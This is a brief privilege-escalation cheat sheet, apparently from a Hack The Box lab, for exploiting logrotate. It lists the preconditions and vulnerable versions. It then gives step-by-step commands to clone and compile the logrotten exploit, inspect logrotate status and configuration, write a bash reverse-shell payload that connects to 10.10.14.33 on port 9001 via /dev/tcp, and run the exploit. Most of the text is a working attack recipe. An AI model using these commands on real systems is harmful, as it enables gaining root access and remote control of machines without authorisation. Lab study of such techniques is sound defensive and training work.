Exploit Logrotate

To exploit logrotate, we need some requirements that we have to fulfill.

1. we need write permissions on the log files

2. logrotate must run as a privileged user or root

3. vulnerable versions:

   • 3.8.6

   • 3.11.0

   • 3.15.0

   • 3.18.0

GitHub - whotwagner/logrotten

Intrusionz3r0@htb[/htb]$ git clone <https://github.com/whotwagner/logrotten.git>
Intrusionz3r0@htb[/htb]$ cd logrotten
Intrusionz3r0@htb[/htb]$ gcc logrotten.c -o logrotten

#List logs files
Intrusionz3r0@htb[/htb]$  cat /var/lib/logrotate.status

#List the available options
Intrusionz3r0@htb[/htb]$ grep "create\\|compress" /etc/logrotate.conf | grep -v "#"

#Write payload
Intrusionz3r0@htb[/htb]$ echo 'bash -i >& /dev/tcp/10.10.14.33/9001 0>&1' > payload

Intrusionz3r0@htb[/htb]$ ./logrotten -p ./payload /tmp/tmp.log